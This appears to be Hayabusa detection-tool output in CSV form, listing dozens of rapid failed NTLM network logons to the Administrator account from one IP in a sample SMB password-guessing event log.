2016-09-20 01:50:07.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aDoHrfWlaWZ5GbWV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uliC5Wd7uZR3fIBc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator  :  Type: 3  :  Workstation: Xhg4hg4XDFaXsJRe  :  IP Address: 192.168.198.149  :  SubStatus: 0xc0000072  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator  :  Type: 3  :  Workstation: ZrSGxwUyV6gCUPeb  :  IP Address: 192.168.198.149  :  SubStatus: 0xc0000072  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XUBgTr05x3djEYdM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 40PhGU4ZXu7uihop  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1DJ9r72hXZH9rEkb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: khy2BeyBb9wq00f7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1cDckicL7IMrO7OQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dEEkvfVd3FCap6fa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JGFSyHQ0ZNWofxzE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ItOZqZSDTrdWpkbp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NhNdf5lHfrHKSCXq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xg05F6tdf3kR9kdP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 70rRbaC6L6SzT15q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HnJyN8wF21ff2L1e  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MUZHZJMQznj6GBqg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: P9h52ZKMbXLuFvUV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n95RJvcQnFrAG2iX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xI23nmysFlr1pvVf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nVsjcTxDdZbzkmMx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mMuWatQuNBh9UKdR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BfC3JZ3awqFDNQbm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 337h8PHN6Axi0iaY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qGQpWOuzgETfxTgJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oFjlyMAJMI2zIC8w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7exAVz3PlzJQ6Wcw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RuYihjQpt76foAW3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OlPm2vRh9EHN9J6n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n9jDy3NDDPe7XgyW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AtGxqEKOoP6W3w0Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BLqYztXwV80UBez1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C0yki1dEFZrnMLs2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jbE2z1W1wQgoTDso  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IJmZFXFxiLuWWkMC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: x9EPwprgXSJNUFfg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h0ZjYxZ8K5m5F1vo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xSw7OjDv8ldqbm5T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mk0BAdOI210HwPhX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wSwWz57Kvl2XJVUR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DLcfSrHT5bSsNnuQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rQDkbESps0PXWEUT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZpnyzkXasuyAtdn1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ps9IqJzTliJvzpIS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V7PLb2uRTIY8t123  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sHAJ9p0QbSRxhvtk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YRiE1wGrwWAx0feP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Flo4bCVjmlaHz0QS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HscUujSzd3Ua7dqg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aIQPTx67aEer51wb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MqUoXUf7PKIaoDjs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wzeB4DAS1W633tmh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UTtXTrqHoCZMbDLT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4HVv5PgPhiDW3qcj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g21VoO45UrIbTuZO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rGpD7AJUTekDmd6Q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OykzTOn7B9THv0cT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cIYOrBBwX8nFpCzw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SvnROHLMVnmPfAyy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5EwJ84H7kXQXzGZz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 34RLeLWDgLayU3JM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QaXHGUgboODAi5Qu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QlOlZ0m397CsmaeD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: N24rSPCI8DsQIPXR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5y2tgoUcs6mFPZm4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HmFX6MioYqaMumgw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: R4HRWlPWPKy1Cicq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GDUf7wVbHkS9uaPC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eBX0Lviz6Bv5rGcb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zZwPm9qahLU78FRY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jOVsopykTHNQcYUp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n8DY7sdDY8nuWdME  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
